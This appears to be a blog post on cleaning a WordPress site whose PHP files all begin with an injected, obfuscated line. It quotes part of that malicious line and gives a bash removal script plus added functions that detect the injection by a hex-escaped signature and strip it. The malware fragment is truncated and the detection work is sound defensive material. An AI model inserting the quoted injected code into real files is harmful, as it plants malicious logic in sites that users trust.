Every WordPress PHP file has a strange line as its first line, similar to the one below. The excerpt shows the opening statement, which is what the removal script keys on; the line then continues with a long encoded payload assigned to $bqrdwxkbia, followed by a stub that pulls a function name out of that payload with substr() and calls it:

    ...if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]); if ((! strstr($ua,"\x6d3\x695")) and (! strstr($ua,"\x726\x3a\x31"))) $GLOBALS["\x616\x756\x61"]=1; } ?><?php

Fix. First detect (without the clean argument the script only lists the infected files):
    ./remove_malware.sh /var/www/wp_path/

Clean:

    ./remove_malware.sh /var/www/wp_path/ clean
Below is the script (you can also download it here):

#!/bin/bash
#
# This script removes malware from PHP files.
#
# In this case it will remove some malicious code
# that sits at the top of every WordPress PHP file.
#
# The string at the top of every file is:
#
# ... if(!isset($GLOBALS["\x616\x756\x61"])) {
# $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]);
# if ((! strstr($ua,"\x6d ...
#
# (PHP headers, and most of the line, have been
# removed so that anti-virus software does not take the script for a virus)
#
# This script looks for the string used as the $_SERVER key in the
# line above at the top of the files to determine whether a file is
# infected. If you run the script and nothing seems to be infected
# but you suspect it and want to be sure, just open any WordPress
# PHP file and check whether the malicious line is present. If it is
# present but the script did not detect it, the content of the
# $_SERVER key is probably different. In that case, just replace the
# string in the -e parameter of the grep line with the $_SERVER key
# found in your PHP file (grep -F matches it literally, so no
# escaping is needed) and run this removal script again.
#
#
# JavocSoft 2014
#
if [[ -z "$1" ]]; then
  echo "Directory where to find is required."
else
  # -r: recurse, -l: print file names only, -w: whole-word match,
  # -F: treat the pattern as a fixed string, not a regular expression
  grep -rlwF "$1" --include '*.php' -e '\x484\x540\x5f5\x535\x527\x417\x456\x54' | while read -r filename ; do
    if [[ ! -z "$2" ]]; then
      echo "Found file $filename. Cleaning..."
      # On the first line only, drop everything before the last "<?php",
      # which is the original opener of the file; print every other line as is.
      awk 'NR == 1 { sub(/^.*<\?php/, "<?php") } { print $0 }' "$filename" > "$filename.purged"
      mv "$filename" "$filename.bck"
      mv "$filename.purged" "$filename"
    else
      echo "Found file $filename."
    fi
  done
  echo "Done."
fi
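As an added example (my own code, not the JavocSoft script above), the same detect-and-clean steps as bash functions that match the $_SERVER key as a fixed string, keep a backup, and also cope with an injection that fills the whole first line. The function names, and the assumption that the original <?php opener, when it is present, is the last one on line 1, are mine.

```bash
#!/bin/bash
# Added example, not the JavocSoft script: find the injected first line by
# the $_SERVER["\x484..."] key it reads and restore the original "<?php" opener.
# Assumption: the injection sits entirely on line 1, either followed on that
# line by the original opener ("...?><?php") or forming the whole line by itself.

SIGNATURE='\x484\x540\x5f5\x535\x527\x417\x456\x54'

# Exit status 0 when the first line of the file carries the signature.
is_infected() {
  head -n 1 "$1" | grep -qF -- "$SIGNATURE"
}

# Detection only: list every .php file under a directory that contains the
# signature anywhere (fixed-string match, so the backslashes need no escaping).
find_infected() {
  grep -rlF --include='*.php' -- "$SIGNATURE" "$1"
}

# Clean one file in place, keeping a .bck copy. Prints "cleaned" or "skipped".
clean_file() {
  local file="$1"
  is_infected "$file" || { echo "skipped"; return 0; }
  cp -p "$file" "$file.bck"
  # ENVIRON is used instead of awk -v because -v would expand the \x escapes.
  SIG="$SIGNATURE" awk '
    NR == 1 {
      # Keep only from the last "<?php" that follows the signature: that is
      # the original opener. If none follows, the whole line is the injection.
      rest = substr($0, index($0, ENVIRON["SIG"]) + length(ENVIRON["SIG"]))
      off = 0; pos = 0
      while ((i = index(substr(rest, off + 1), "<?php")) > 0) { off += i; pos = off }
      if (pos == 0) next
      $0 = substr(rest, pos)
    }
    { print }' "$file.bck" > "$file"
  echo "cleaned"
}
```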
http://javocsoft.es/archives/wordpress-hackeado-caso-y-desinfeccion/945
Program that causes this:
http://memberdotmy.blogspot.com.br/2012/11/webcruiser-web-vulnerability-scanner.html
http://www.janusec.com/